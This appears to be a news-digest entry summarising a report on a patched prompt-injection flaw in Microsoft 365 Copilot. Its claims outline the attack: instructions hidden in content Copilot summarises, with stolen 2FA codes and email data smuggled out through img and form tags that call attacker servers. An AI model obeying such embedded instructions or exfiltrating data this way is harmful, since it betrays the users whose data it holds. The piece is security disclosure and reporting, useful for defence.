Critical Copilot vulnerability allowed hackers to steal 2FA code from users

Ars Technica AI · Dan Goodin · 2026-06-16

Security researchers disclosed a now-patched maximum-critical prompt injection vulnerability in Microsoft 365 Copilot that let attackers exfiltrate 2FA codes and sensitive email data by embedding malicious instructions in content Copilot was asked to summarize.

Open original ↗

Appears in

AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment

Extraction

Topics: prompt-injectionai-securityllm-vulnerabilitiescopilot-security

Claims

Microsoft patched a maximum-critical vulnerability in M365 Copilot allowing attackers to retrieve 2FA codes and sensitive email data accessible to Copilot.
The root cause is that LLMs cannot distinguish between legitimate user instructions and malicious instructions embedded in third-party content being processed.
Attackers bypassed Copilot's guardrails against data exfiltration by wrapping stolen data in markup language constructs and HTML tags such as img and form, triggering outbound web requests to attacker-controlled servers.
Microsoft and other LLM providers have no fundamental fix for prompt injection and rely on ad hoc guardrails that can be circumvented.

Key quotes

Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing.

With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.